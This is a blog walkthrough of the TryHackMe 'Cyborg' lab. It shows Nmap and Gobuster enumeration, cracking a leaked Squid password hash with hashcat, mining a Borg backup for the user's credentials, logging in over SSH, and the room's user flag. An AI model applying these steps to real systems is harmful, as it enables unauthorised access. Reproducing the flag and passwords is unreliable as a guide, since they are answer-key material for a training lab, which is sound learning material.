Cyborg Room Walkthrough

2024-11-17 621 words 3 mins read

TryHackMe Cyborg CTF OSINT Pentesting

Room Overview

Room URL: Cyborg

Room IP: 10.10.79.217 - This will be different for you.

Recon

We begin our reconnaissance phase by scanning the target using Nmap. This helps us identify the open ports and services running on the machine.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-28 16:28 GMT
Nmap scan report for ip-10-10-79-217.eu-west-1.compute.internal (10.10.79.217)
Host is up (0.018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:1F:A9:A5:69:89 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

Web Enumeration

Next, we perform directory enumeration using Gobuster to find hidden directories on the web server.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


root@ip-10-10-53-222:~# gobuster dir -u 10.10.79.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.79.217
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 312] [--> http://10.10.79.217/admin/]
/etc                  (Status: 301) [Size: 310] [--> http://10.10.79.217/etc/]
/server-status        (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

Accessing Admin Panel

We found an admin panel at http://10.10.79.217/admin/admin.html.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


http://10.10.79.217/admin/admin.html

Admin
Admin Shoutbox

[Yesterday at 4.32pm from Josh]
Are we all going to watch the football game at the weekend??

[Yesterday at 4.33pm from Adam]
Yeah Yeah mate absolutely hope they win!

[Today at 5.45am from Alex]
Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy I mentioned earlier...

Extracting Credentials from Squid Configuration

The configuration for the Squid proxy can be found in the squid.conf file:

1
2
3
4
5
6


auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

From the password file, we can extract a hashed password:

1

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Using Hashcat, we can crack this password:

1
2


hashcat --user cyborg rockyou.txt
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward

Downloading the Archive

After cracking the password, we can download the archive from the admin menu:

1

root@ip-10-10-53-222:~# tar xvf archive.tar

Working with Borg Backup

Next, we will install Borg Backup and mount the backup repository:

1
2
3
4


apt install borgbackup
root@ip-10-10-53-222:~/home/field/dev/final_archive# mkdir /tmp/a
root@ip-10-10-53-222:~/home/field/dev/final_archive# borg mount . /tmp/a 
Enter passphrase for key /root/home/field/dev/final_archive: 

After mounting, we can navigate to the user’s documents:

1
2
3


root@ip-10-10-53-222:/tmp/a/music_archive/home/alex# cat ./Documents/note.txt ./Desktop/secret.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3

SSH Access

Using the password found in the note, we can SSH into the target as the user alex:

1

ssh alex@10.10.79.217

Once logged in, we can access user flags:

1
2


alex@ubuntu:~$ cat user.txt 
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

Privilege Escalation

Lastly, we analyze the backup.sh script to identify any potential for privilege escalation:

1
2
3
4


alex@ubuntu:~$ cat /etc/mp3backups/backup.sh
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

Conclusion

This room provided a hands-on experience with various techniques including web enumeration, password cracking, and exploiting a backup system for privilege escalation. The knowledge gained here is invaluable for real-world scenarios in penetration testing.

Tags: TryHackMe Cyborg CTF OSINT Pentesting

2024/04/05 Preparation and Review of eMAPT (INE security FKA eLearnSecurity Mobile Application Penetration Tester

Authored By Amit Agarwal

Amit Agarwal, Linux and Photography are my hobbies.Creative Commons Attribution 4.0 International License.

Exploring MSC Files in Windows ❯

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now

Contents